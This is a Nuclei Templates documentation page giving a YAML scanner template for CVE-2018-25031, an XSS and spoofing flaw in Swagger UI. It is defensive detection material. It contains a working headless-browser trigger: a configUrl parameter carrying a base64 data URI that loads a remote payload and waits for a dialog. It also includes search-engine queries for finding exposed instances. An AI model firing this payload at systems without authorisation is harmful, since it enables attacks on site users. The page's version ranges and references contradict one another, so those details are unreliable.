Skip to content
Nuclei Templates

Swagger UI < 3.38.0 - Cross-Site Scripting

ID: CVE-2018-25031

Severity: medium

Author: DhiyaneshDK

Tags: headless,cve,cve2018,swagger,xss,smartbear

Description

Section titled “Description”

Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.

YAML Source

Section titled “YAML Source”
id: CVE-2018-25031


info:
  name: Swagger UI < 3.38.0 - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.
  remediation: |
    Update to the latest version of the Swagger UI (^4.13.0 or higher) to mitigate the vulnerability.
  reference:
    - https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-25031
    - https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3506
    - https://github.com/swagger-api/swagger-ui/issues/4872
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2018-25031
    cwe-id: CWE-20
    epss-score: 0.00265
    epss-percentile: 0.65516
    cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: smartbear
    product: swagger_ui
    shodan-query:
      - http.component:"Swagger"
      - http.component:"swagger"
      - http.favicon.hash:"-1180440057"
    fofa-query: icon_hash="-1180440057"
  tags: headless,cve,cve2018,swagger,xss,smartbear


headless:
  - steps:
      - args:
          url: '{{BaseURL}}/index.html?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Byb2plY3RkaXNjb3ZlcnkvbnVjbGVpLXRlbXBsYXRlcy9tYWluL2hlbHBlcnMvcGF5bG9hZHMvc3dhZ2dlci1wYXlsb2FkIgp9'
        action: navigate


      - action: waitdialog
        name: swagger_dom


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - swagger_dom == true


      - type: word
        part: body
        words:
          - "swagger"
        case-insensitive: true
# digest: 4a0a004730450220562625cf9d0b39525c5dea0c5f836c056faf8eaf4af1167015f8ecd599dda471022100ff45c3d91cd24bcb60b6dc6b97ba00415f73dec7cec12a2290e62d0c4e289b8a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "headless/cves/2018/CVE-2018-25031.yaml"

View on Github